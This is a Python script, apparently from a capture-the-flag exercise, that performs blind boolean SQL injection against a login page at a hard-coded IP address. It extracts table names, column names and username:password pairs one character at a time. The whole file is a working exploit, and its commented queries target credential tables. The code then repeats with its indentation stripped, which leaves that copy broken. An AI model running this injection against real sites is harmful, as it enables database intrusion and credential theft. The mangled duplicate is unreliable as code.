abdilahrf/blind_sqlinjection.py

## blind_sqlinjection.py
import requests
import re

url = "http://88.198.233.174:33534/index.php"
payload = {
	"username":"",
	"password":"x",
}

def check(data):
	return re.search("Construction!", data)

def blind(kolom,table):
    passwd = ""
    idx = 1

    while (True):

        lo = 1
        hi = 255
        temp = -1
        while(lo <= hi):
            mid = (lo + hi) / 2
            payload['username'] = "' OR 1=1 and (select ascii(substring({},{},1)) from {}) <= {}#".format(str(kolom),str(idx),str(table),str(mid))
            # print payload
            res = requests.post(url,data=payload)
            if check(res.text):
               hi = mid-1
               temp = mid
            else:
               lo = mid+1

        if (hi == 0): break
        passwd += chr(temp)
        print "Result [{}]: {}".format(table,passwd)
        idx += 1

    return passwd

# get table name
# blind("group_concat(table_name)", "information_schema.tables where table_schema!=0x696e666f726d6174696f6e5f736368656d61")
# blind("group_concat(table_name)", "information_schema.tables order by table_schema desc")
# Result: users
#
# get column name
# username,password
# blind("group_concat(column_name)", "information_schema.columns where table_name='users'")
# blind("group_concat(column_name)", "information_schema.columns where table_name='Login'")
# blind("group_concat(column_name)", "information_schema.columns where table_name='Flag'")

# get data
# blind("group_concat(username,0x3a,password)", "users")
# blind("group_concat(username,password)", "Login")
# blind("group_concat(username,password)", "Flag")
	import requests
	import re

	url = "http://88.198.233.174:33534/index.php"
	payload = {
	"username":"",
	"password":"x",
	}

	def check(data):
	return re.search("Construction!", data)

	def blind(kolom,table):
	passwd = ""
	idx = 1

	while (True):

	lo = 1
	hi = 255
	temp = -1
	while(lo <= hi):
	mid = (lo + hi) / 2
	payload['username'] = "' OR 1=1 and (select ascii(substring({},{},1)) from {}) <= {}#".format(str(kolom),str(idx),str(table),str(mid))
	# print payload
	res = requests.post(url,data=payload)
	if check(res.text):
	hi = mid-1
	temp = mid
	else:
	lo = mid+1

	if (hi == 0): break
	passwd += chr(temp)
	print "Result [{}]: {}".format(table,passwd)
	idx += 1

	return passwd

	# get table name
	# blind("group_concat(table_name)", "information_schema.tables where table_schema!=0x696e666f726d6174696f6e5f736368656d61")
	# blind("group_concat(table_name)", "information_schema.tables order by table_schema desc")
	# Result: users
	#
	# get column name
	# username,password
	# blind("group_concat(column_name)", "information_schema.columns where table_name='users'")
	# blind("group_concat(column_name)", "information_schema.columns where table_name='Login'")
	# blind("group_concat(column_name)", "information_schema.columns where table_name='Flag'")

	# get data
	# blind("group_concat(username,0x3a,password)", "users")
	# blind("group_concat(username,password)", "Login")
	# blind("group_concat(username,password)", "Flag")